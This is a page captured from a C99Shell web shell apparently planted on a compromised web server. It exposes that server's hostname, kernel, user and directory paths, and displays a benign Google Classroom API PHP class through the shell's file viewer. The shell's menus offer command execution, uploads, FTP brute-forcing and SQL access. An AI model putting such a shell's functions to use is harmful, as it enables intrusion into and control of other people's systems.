!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/google/apiclient-services/src/Classroom/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     StudentSubmission.php (5.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\Classroom;

class 
StudentSubmission extends \Google\Collection
{
  protected 
$collection_key 'submissionHistory';
  
/**
   * @var string
   */
  
public $alternateLink;
  public 
$assignedGrade;
  protected 
$assignmentSubmissionType AssignmentSubmission::class;
  protected 
$assignmentSubmissionDataType '';
  
/**
   * @var bool
   */
  
public $associatedWithDeveloper;
  
/**
   * @var string
   */
  
public $courseId;
  
/**
   * @var string
   */
  
public $courseWorkId;
  
/**
   * @var string
   */
  
public $courseWorkType;
  
/**
   * @var string
   */
  
public $creationTime;
  public 
$draftGrade;
  
/**
   * @var string
   */
  
public $id;
  
/**
   * @var bool
   */
  
public $late;
  protected 
$multipleChoiceSubmissionType MultipleChoiceSubmission::class;
  protected 
$multipleChoiceSubmissionDataType '';
  protected 
$shortAnswerSubmissionType ShortAnswerSubmission::class;
  protected 
$shortAnswerSubmissionDataType '';
  
/**
   * @var string
   */
  
public $state;
  protected 
$submissionHistoryType SubmissionHistory::class;
  protected 
$submissionHistoryDataType 'array';
  
/**
   * @var string
   */
  
public $updateTime;
  
/**
   * @var string
   */
  
public $userId;

  
/**
   * @param string
   */
  
public function setAlternateLink($alternateLink)
  {
    
$this->alternateLink $alternateLink;
  }
  
/**
   * @return string
   */
  
public function getAlternateLink()
  {
    return 
$this->alternateLink;
  }
  public function 
setAssignedGrade($assignedGrade)
  {
    
$this->assignedGrade $assignedGrade;
  }
  public function 
getAssignedGrade()
  {
    return 
$this->assignedGrade;
  }
  
/**
   * @param AssignmentSubmission
   */
  
public function setAssignmentSubmission(AssignmentSubmission $assignmentSubmission)
  {
    
$this->assignmentSubmission $assignmentSubmission;
  }
  
/**
   * @return AssignmentSubmission
   */
  
public function getAssignmentSubmission()
  {
    return 
$this->assignmentSubmission;
  }
  
/**
   * @param bool
   */
  
public function setAssociatedWithDeveloper($associatedWithDeveloper)
  {
    
$this->associatedWithDeveloper $associatedWithDeveloper;
  }
  
/**
   * @return bool
   */
  
public function getAssociatedWithDeveloper()
  {
    return 
$this->associatedWithDeveloper;
  }
  
/**
   * @param string
   */
  
public function setCourseId($courseId)
  {
    
$this->courseId $courseId;
  }
  
/**
   * @return string
   */
  
public function getCourseId()
  {
    return 
$this->courseId;
  }
  
/**
   * @param string
   */
  
public function setCourseWorkId($courseWorkId)
  {
    
$this->courseWorkId $courseWorkId;
  }
  
/**
   * @return string
   */
  
public function getCourseWorkId()
  {
    return 
$this->courseWorkId;
  }
  
/**
   * @param string
   */
  
public function setCourseWorkType($courseWorkType)
  {
    
$this->courseWorkType $courseWorkType;
  }
  
/**
   * @return string
   */
  
public function getCourseWorkType()
  {
    return 
$this->courseWorkType;
  }
  
/**
   * @param string
   */
  
public function setCreationTime($creationTime)
  {
    
$this->creationTime $creationTime;
  }
  
/**
   * @return string
   */
  
public function getCreationTime()
  {
    return 
$this->creationTime;
  }
  public function 
setDraftGrade($draftGrade)
  {
    
$this->draftGrade $draftGrade;
  }
  public function 
getDraftGrade()
  {
    return 
$this->draftGrade;
  }
  
/**
   * @param string
   */
  
public function setId($id)
  {
    
$this->id $id;
  }
  
/**
   * @return string
   */
  
public function getId()
  {
    return 
$this->id;
  }
  
/**
   * @param bool
   */
  
public function setLate($late)
  {
    
$this->late $late;
  }
  
/**
   * @return bool
   */
  
public function getLate()
  {
    return 
$this->late;
  }
  
/**
   * @param MultipleChoiceSubmission
   */
  
public function setMultipleChoiceSubmission(MultipleChoiceSubmission $multipleChoiceSubmission)
  {
    
$this->multipleChoiceSubmission $multipleChoiceSubmission;
  }
  
/**
   * @return MultipleChoiceSubmission
   */
  
public function getMultipleChoiceSubmission()
  {
    return 
$this->multipleChoiceSubmission;
  }
  
/**
   * @param ShortAnswerSubmission
   */
  
public function setShortAnswerSubmission(ShortAnswerSubmission $shortAnswerSubmission)
  {
    
$this->shortAnswerSubmission $shortAnswerSubmission;
  }
  
/**
   * @return ShortAnswerSubmission
   */
  
public function getShortAnswerSubmission()
  {
    return 
$this->shortAnswerSubmission;
  }
  
/**
   * @param string
   */
  
public function setState($state)
  {
    
$this->state $state;
  }
  
/**
   * @return string
   */
  
public function getState()
  {
    return 
$this->state;
  }
  
/**
   * @param SubmissionHistory[]
   */
  
public function setSubmissionHistory($submissionHistory)
  {
    
$this->submissionHistory $submissionHistory;
  }
  
/**
   * @return SubmissionHistory[]
   */
  
public function getSubmissionHistory()
  {
    return 
$this->submissionHistory;
  }
  
/**
   * @param string
   */
  
public function setUpdateTime($updateTime)
  {
    
$this->updateTime $updateTime;
  }
  
/**
   * @return string
   */
  
public function getUpdateTime()
  {
    return 
$this->updateTime;
  }
  
/**
   * @param string
   */
  
public function setUserId($userId)
  {
    
$this->userId $userId;
  }
  
/**
   * @return string
   */
  
public function getUserId()
  {
    return 
$this->userId;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(StudentSubmission::class, 'Google_Service_Classroom_StudentSubmission');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--